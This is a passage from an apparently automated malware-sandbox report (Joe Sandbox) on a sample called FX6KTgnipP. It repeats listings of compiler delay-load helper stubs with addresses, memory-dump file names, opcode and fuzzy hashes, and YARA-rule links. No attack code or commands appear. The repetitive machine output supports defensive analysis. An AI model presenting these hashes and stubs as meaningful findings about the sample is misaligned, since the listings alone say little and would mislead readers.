                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID: I=uqI&
                                                                                                                                                                            • API String ID: 1269201914-3646153225
                                                                                                                                                                            • Opcode ID: a0cc1b32d81c2db5adc29641a79813e45567fb5fbe0ed7d316ed5b4b5c0db439
                                                                                                                                                                            • Instruction ID: b1590c8dd79d85df62a5cd3ab172307bf088d66bbac6db5bd6a98beaebee559a
                                                                                                                                                                            • Opcode Fuzzy Hash: a0cc1b32d81c2db5adc29641a79813e45567fb5fbe0ed7d316ed5b4b5c0db439
                                                                                                                                                                            • Instruction Fuzzy Hash: A9B012892BE200AD374471143D03C37010CC2C2B10330461BF444C2581D4808DF00131
                                                                                                                                                                            Function 00264953 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264918
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID: I=uqI&
                                                                                                                                                                            • API String ID: 1269201914-3646153225
                                                                                                                                                                            • Opcode ID: 7ecdc373fffbab3faffb691044a6aa7495b724b28f1764254d35f23e55427aa8
                                                                                                                                                                            • Instruction ID: b6d1b8b6c36bad849640399b7f46aeda9ddaf4acbbf1739f2e4edc16bdac08ef
                                                                                                                                                                            • Opcode Fuzzy Hash: 7ecdc373fffbab3faffb691044a6aa7495b724b28f1764254d35f23e55427aa8
                                                                                                                                                                            • Instruction Fuzzy Hash: 70B012892BE200AD330471143E03C37010CC2C2B10330451AF844C2581D4818FF10131
                                                                                                                                                                            Function 0026495D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264918
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID: I=uqI&
                                                                                                                                                                            • API String ID: 1269201914-3646153225
                                                                                                                                                                            • Opcode ID: d0383e0e5d57209e1f9be7f473bf5eb80990b0b4d9d78af743add12fea09017e
                                                                                                                                                                            • Instruction ID: adb6655cbf7d0bf24db23c45cdf881ac2549ef32091c242127506315e306762a
                                                                                                                                                                            • Opcode Fuzzy Hash: d0383e0e5d57209e1f9be7f473bf5eb80990b0b4d9d78af743add12fea09017e
                                                                                                                                                                            • Instruction Fuzzy Hash: A8B012892BE100AD330471143D03C37010CC2C2B10330451AF444C2585D4808DF00231
                                                                                                                                                                            Function 002649A3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264918
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID: I=uqI&
                                                                                                                                                                            • API String ID: 1269201914-3646153225
                                                                                                                                                                            • Opcode ID: 109e0db79e98514d070315dc3adaf9233a44052d560cea5efc70c01dcd9cc353
                                                                                                                                                                            • Instruction ID: d00938e05091fa1617d30c2e74810d2e4c3f516f8eb9409dd2de9f10b78f04fc
                                                                                                                                                                            • Opcode Fuzzy Hash: 109e0db79e98514d070315dc3adaf9233a44052d560cea5efc70c01dcd9cc353
                                                                                                                                                                            • Instruction Fuzzy Hash: 42B012952BE000AD330471143E03D37010CC2C2B10330452AF848C2481D4818FF10131
                                                                                                                                                                            Function 002649B7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264918
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID: I=uqI&
                                                                                                                                                                            • API String ID: 1269201914-3646153225
                                                                                                                                                                            • Opcode ID: 5f6f89f6835c2896381753017e32eb6d30defc8fc2db330462ebaed90206397a
                                                                                                                                                                            • Instruction ID: 027fe3c1723f6cdfb4bea32305026b8c7dc07b983f39a0f0152e3aa8ff384d67
                                                                                                                                                                            • Opcode Fuzzy Hash: 5f6f89f6835c2896381753017e32eb6d30defc8fc2db330462ebaed90206397a
                                                                                                                                                                            • Instruction Fuzzy Hash: 2BB012852BF000AD370471143D03C37010DC2C3B10330851AF844C24C1D4808DF00131
                                                                                                                                                                            Function 00264985 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264918
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID: I=uqI&
                                                                                                                                                                            • API String ID: 1269201914-3646153225
                                                                                                                                                                            • Opcode ID: 47b91d55aa5368cf235e12027596a2e5aa2c5f859bf128c78b0452fc3b5f5361
                                                                                                                                                                            • Instruction ID: 788cd035bb41b8d036d5b4d89a4e8dc0da36e6cbec8b33d12ae7f4e848f7360d
                                                                                                                                                                            • Opcode Fuzzy Hash: 47b91d55aa5368cf235e12027596a2e5aa2c5f859bf128c78b0452fc3b5f5361
                                                                                                                                                                            • Instruction Fuzzy Hash: 9FB012852BE000AD330871643D03C37010CC2C3B10330891AF444C2581D4808DF40131
                                                                                                                                                                            Function 0026498F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264918
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID: I=uqI&
                                                                                                                                                                            • API String ID: 1269201914-3646153225
                                                                                                                                                                            • Opcode ID: fed714a7785db3dfd1eb7c918c75a95cf2493d823c110c4910bba60c10047f2a
                                                                                                                                                                            • Instruction ID: 76a74858d21e3417e5a7efdc7b95a305cd8eb37f76b88341a455da57374e6ab5
                                                                                                                                                                            • Opcode Fuzzy Hash: fed714a7785db3dfd1eb7c918c75a95cf2493d823c110c4910bba60c10047f2a
                                                                                                                                                                            • Instruction Fuzzy Hash: 48B012952BE000AD330471143D03D37010CC2C3B10330852AF848C2481D4808EF00131
                                                                                                                                                                            Function 00264999 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264918
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID: I=uqI&
                                                                                                                                                                            • API String ID: 1269201914-3646153225
                                                                                                                                                                            • Opcode ID: 4f03da55048aca63bff090ddef0c8c569ba713f7a2b1c2bcae3277ea452cfade
                                                                                                                                                                            • Instruction ID: 470bc1936c420556fa3e6fd6d969e551e511b9247d5b7ccc06c8828db86b6cc3
                                                                                                                                                                            • Opcode Fuzzy Hash: 4f03da55048aca63bff090ddef0c8c569ba713f7a2b1c2bcae3277ea452cfade
                                                                                                                                                                            • Instruction Fuzzy Hash: EEB012952BE100AD334471143D03D37010CC2C2B50330462BF448C2481D4808EF00131
                                                                                                                                                                            Function 002649C1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264918
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID: I=uqI&
                                                                                                                                                                            • API String ID: 1269201914-3646153225
                                                                                                                                                                            • Opcode ID: d68bb173ac49a275534125d2b50874dd96859cc138f29dd6ce6bc96cd4e7fad3
                                                                                                                                                                            • Instruction ID: 443332fa5ecdb178ddb29fd2f0c99100c435f4158115a039b1959e880005a949
                                                                                                                                                                            • Opcode Fuzzy Hash: d68bb173ac49a275534125d2b50874dd96859cc138f29dd6ce6bc96cd4e7fad3
                                                                                                                                                                            • Instruction Fuzzy Hash: 3DB012952BF100AD374472143D03C37010DC2C2B10330461BF444C2481D4808DF00131
                                                                                                                                                                            Function 002649D5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264918
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID: I=uqI&
                                                                                                                                                                            • API String ID: 1269201914-3646153225
                                                                                                                                                                            • Opcode ID: e0075fc7bf375cb84eb05bd82189106b1d5c7eed14479f29af2a9ec568cb12e5
                                                                                                                                                                            • Instruction ID: 7b8e572272c1207d6ba2ca73f1155451c43d24f9d7923a97a10963d94a10d968
                                                                                                                                                                            • Opcode Fuzzy Hash: e0075fc7bf375cb84eb05bd82189106b1d5c7eed14479f29af2a9ec568cb12e5
                                                                                                                                                                            • Instruction Fuzzy Hash: 5CB012852BF000AD370471143D03C3B014EC6C2B10330451AF444C2481D4808DF00131
                                                                                                                                                                            Function 00264A07 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264918
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID: I=uqI&
                                                                                                                                                                            • API String ID: 1269201914-3646153225
                                                                                                                                                                            • Opcode ID: e43fa8cec1b6ca2efc8f2dc44272bbc05a8dfca582c6d694ad5c82e1d3eafd72
                                                                                                                                                                            • Instruction ID: 393535b9961bde7656ee15e1a2eb531220ea20ebcfdba5781a3435af4c74ae9a
                                                                                                                                                                            • Opcode Fuzzy Hash: e43fa8cec1b6ca2efc8f2dc44272bbc05a8dfca582c6d694ad5c82e1d3eafd72
                                                                                                                                                                            • Instruction Fuzzy Hash: 30B012852BE000AD330471143D03C37010CC2C3B10330891AF844C6481D4808DF00131
                                                                                                                                                                            Function 00264976 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264918
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID: I=uqI&
                                                                                                                                                                            • API String ID: 1269201914-3646153225
                                                                                                                                                                            • Opcode ID: 97ee0c1d0f16a6cb2b66dbc0e99dab4527bed93569af4df19e391f84107fee7a
                                                                                                                                                                            • Instruction ID: 2ca98cb7b6b4c0dbf38014df072c1f56a9e4af637b971e3cbc2c2f53c56fd65e
                                                                                                                                                                            • Opcode Fuzzy Hash: 97ee0c1d0f16a6cb2b66dbc0e99dab4527bed93569af4df19e391f84107fee7a
                                                                                                                                                                            • Instruction Fuzzy Hash: 3EA0019A6BE112BC320872617E07C3B421DC6D6BA13318A1AF882C6886A8819AF51531
                                                                                                                                                                            Function 002649B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264918
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID: I=uqI&
                                                                                                                                                                            • API String ID: 1269201914-3646153225
                                                                                                                                                                            • Opcode ID: ee6491b701331c31c92654959974bebfe2dee5e683dc3bd43a51591106833346
                                                                                                                                                                            • Instruction ID: 2ca98cb7b6b4c0dbf38014df072c1f56a9e4af637b971e3cbc2c2f53c56fd65e
                                                                                                                                                                            • Opcode Fuzzy Hash: ee6491b701331c31c92654959974bebfe2dee5e683dc3bd43a51591106833346
                                                                                                                                                                            • Instruction Fuzzy Hash: 3EA0019A6BE112BC320872617E07C3B421DC6D6BA13318A1AF882C6886A8819AF51531
                                                                                                                                                                            Function 002649E4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264918
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
